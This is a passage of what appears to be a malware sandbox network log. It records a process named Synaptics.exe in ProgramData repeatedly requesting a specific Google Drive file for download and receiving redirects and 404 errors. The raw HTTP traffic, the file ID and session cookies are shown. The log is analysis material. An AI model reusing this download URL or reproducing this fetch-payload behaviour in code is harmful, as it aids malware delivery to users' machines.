                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-YyJHhVdVEaApmHA8PLdCYA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.5 | 49801 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-aTpp6NkA-TNaILNR7JZJyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.5 | 49805 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:19 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC67q00C5o_iFOdziiaR8j4UF2FaCVSMZGyb9EXjcE92JYRxbxlUTvNDiYky6tUoOVUOtSOZ9fI
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-XP8sndq2gKVeH2CbBIJ_aw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:19 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:19 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Y5vzdZwWGhVQ8y8d5om3gg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:19 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.5 | 49807 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:19 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:20 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC7MdkIb6jfZdquRZH2DutGXlT2pXQoze3zO1jqmm4-YD2lIq9-mWBCa9Rxxo-2tStEU49s3298
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:19 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-nllpoLKxVhNqGPZ_Xi1waw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:20 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:20 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="Jt-wIT9uosPonD6dqC1bTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:20 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.5 | 49816 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:20 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-m5_AzXYUxi2PHMcSdleH9w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.5 | 49817 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.5 | 49818 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.5 | 49819 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:20 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.5 | 49828 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:21 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
2024-12-30 10:23:21 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5ZL7jZETWOdw9ez3hWjVKzzAlrLiB-a_o-UFF3R9T2Rwi5xVK7KV8cLKPVjpgWCJBbaBCLqVo
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-X_aDOfXI0bC16acdRcR0Ug' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
2024-12-30 10:23:21 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
2024-12-30 10:23:21 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="vSTGKChDCRGw2ARI6AefOQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
2024-12-30 10:23:21 UTC | 122 | IN | Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.5 | 49826 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
2024-12-30 10:23:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-CzJuW3_1V5bZtsc3d-vBvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.5 | 49827 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:23:21 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Host: docs.google.com
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Cookie: NID=520=jSaTa8KuE5l7N4TCIhcrmQMzAXxHbxrS3uxNWo8NBA5sjdlnarGAVbeVVp3-A4J0ZNfe8x2LprxczA5Zgjwq8P8WJXY5VGantWu1oKxYA1QMxzCQ7bqV7fTRHpbkdnMXWNQunQ-1buzm1q0QryipZRTuj1Q6CZLOsIGqqZrTdLLLnMnctG8dcdJ4
                                                                                                                                      2024-12-30 10:23:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                      Content-Type: application/binary
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:21 GMT
                                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-SyAKY5iRRf32fEA-iHwbBA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Server: ESF
                                                                                                                                      Content-Length: 0
                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      60 | 192.168.2.5 | 49834 | 142.250.186.33 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:22 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Cookie: NID=520=Uesc52ScVoO4IsL_GOfeG8wSu4efKdKb2TMgf76rbhyUPGi9o-FD52oteyh8oOOTcm_49e27kIMAYnejkjGUTFjpdHjU6xZqKwtEPwKO3GJWMYnmlYDrlh9e4Od2tE7d4ucrpjX4BnkLktsT13jtjC-QdbZ4WN-bPAVNpY8TAIgS3n9B_ITBhIuB
                                                                                                                                      2024-12-30 10:23:22 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      X-GUploader-UploadID: AFiumC5XXbI-vE8QyrFx0mNffaOVDhpDMQ93tGeLEpt8P0RNfBbVSsZP4QIlP400FUznQcM3
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                      Date: Mon, 30 Dec 2024 10:23:22 GMT
                                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-RWIuIJr2itQKpTqFlt0DRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                                      Content-Length: 1652
                                                                                                                                      Server: UploadServer
                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                                      Connection: close
                                                                                                                                      2024-12-30 10:23:22 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                      2024-12-30 10:23:22 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="_ogbHurQbBlg1UXTjcoyAw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                      2024-12-30 10:23:22 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      61 | 192.168.2.5 | 49835 | 142.250.186.110 | 443 | 6192 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      2024-12-30 10:23:22 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
